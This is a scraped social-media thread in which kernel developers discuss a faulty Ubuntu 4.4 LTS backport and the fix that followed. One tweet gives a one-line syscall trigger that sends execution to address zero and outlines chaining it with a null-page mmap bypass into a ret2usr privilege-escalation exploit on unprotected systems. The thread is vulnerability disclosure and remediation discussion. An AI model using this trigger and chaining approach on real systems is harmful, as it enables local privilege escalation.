|
@vnik5287 | |||||
|
doesn't seem like ubuntu 4.4 LTS kernels want to pull the upstream patch. can still rip <-- 0 with syscall(__NR_clock_gettime, 10, 0) pic.twitter.com/SBceR9K20Y
|
||||||
|
||||||
|
Vitaly Nikolenko
@vnik5287
|
6. lis |
|
combine with P0 null-page mmap bypass on older kernels / AMD or no-smep systems and you got yourself an easy ret2usr exploit
|
||
|
|
||
|
Gustavo A. R. Silva
@embeddedgus
|
6. lis |
|
Do you see this in LTS 4.9?
|
||
|
|
||
|
Vitaly Nikolenko
@vnik5287
|
6. lis |
|
don't know any Ubuntu lts versions that use 4.9? Upstream is fixed, it's just Ubuntu being special
|
||
|
|
||
|
Ori Nimron
@orinimron123
|
6. lis |
|
Hi,
Any idea why it didn't work for me? pic.twitter.com/glO74DSy5V
|
||
|
|
||
|
Vitaly Nikolenko
@vnik5287
|
6. lis |
|
hahah looks like it got un-"patched" in recent kernels. your version has the patch applied. try something more recent.. mine was 4.4.0-161 from Aug this year
|
||
|
|
||
|
Kees Cook
@kees_cook
|
7. lis |
|
@colinianking This looks like a bad backport in Ubuntu's 4.4. The upstream v4.4 doesn't carry the speculation fix at all. When posix_clocks[] changed from registration to static, the now-redundant .clock_get check was removed. It shouldn't be for v4.4:
kernel.ubuntu.com/git/ubuntu/ubu…
|
||
|
|
||
|
Tyler Hicks
@tyhicks
|
8. lis |
|
We've now got a fix making its way into our kernels:
lists.ubuntu.com/archives/kerne…
|
||
|
|
||